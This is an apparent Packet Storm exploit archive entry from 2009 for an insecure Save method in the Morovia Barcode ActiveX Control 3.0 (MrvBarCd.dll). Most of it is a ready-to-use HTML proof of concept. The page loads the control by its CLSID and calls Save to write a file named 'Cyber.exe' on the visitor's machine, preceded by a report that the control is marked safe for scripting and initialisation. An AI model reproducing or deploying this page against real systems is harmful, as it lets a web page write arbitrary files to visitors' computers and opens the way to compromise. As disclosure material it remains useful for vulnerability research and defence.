Morovia Barcode Insecure Method

2009-03-13T00:00:00
ID PACKETSTORM:75704
Type packetstorm
Reporter Cyber-Zone
Modified 2009-03-13T00:00:00

Description

                                        
                                            `<HTML>  
Morovia Barcode ActiveX Control 3.0 (MrvBarCd.dll) Insecure Method Exploit<br>  
<br>  
Description There is Insecure Method in (Save) fonction<br>  
Download Product : http://download.morovia.com/demo/MrvBarCd_Demo_V3.4.0.0.msi<br>  
Found By : Cyber-Zone<br>  
Tested Under : sp2 fr <br>  
E-mail : Paradis_des_fous@hotmail.fr<br>  
Home : WwW.IQ-Ty.CoM , WwW.No-Exploit.CoM<br>  
SP thnx To : Hussin X , Jiko ( Che7ta4Ever My Best Friend ) No-Exploit TeaM , StaCk ( Thanx4Help ) ...All Mgharba ...  
<!--  
Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141}  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller,data   
IPersist Safe: Safe for untrusted: caller,data   
IPStorage Safe: Safe for untrusted: caller,data   
-->  
  
<title>Exploited By : Cyber-Zone </title>  
<BODY>  
<object id=cyber classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object>  
  
<SCRIPT>  
  
function Do_it()  
{  
File = "Cyber.exe"  
cyber.Save(File)  
}  
  
</SCRIPT>  
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>  
</body>  
</HTML>  
  
`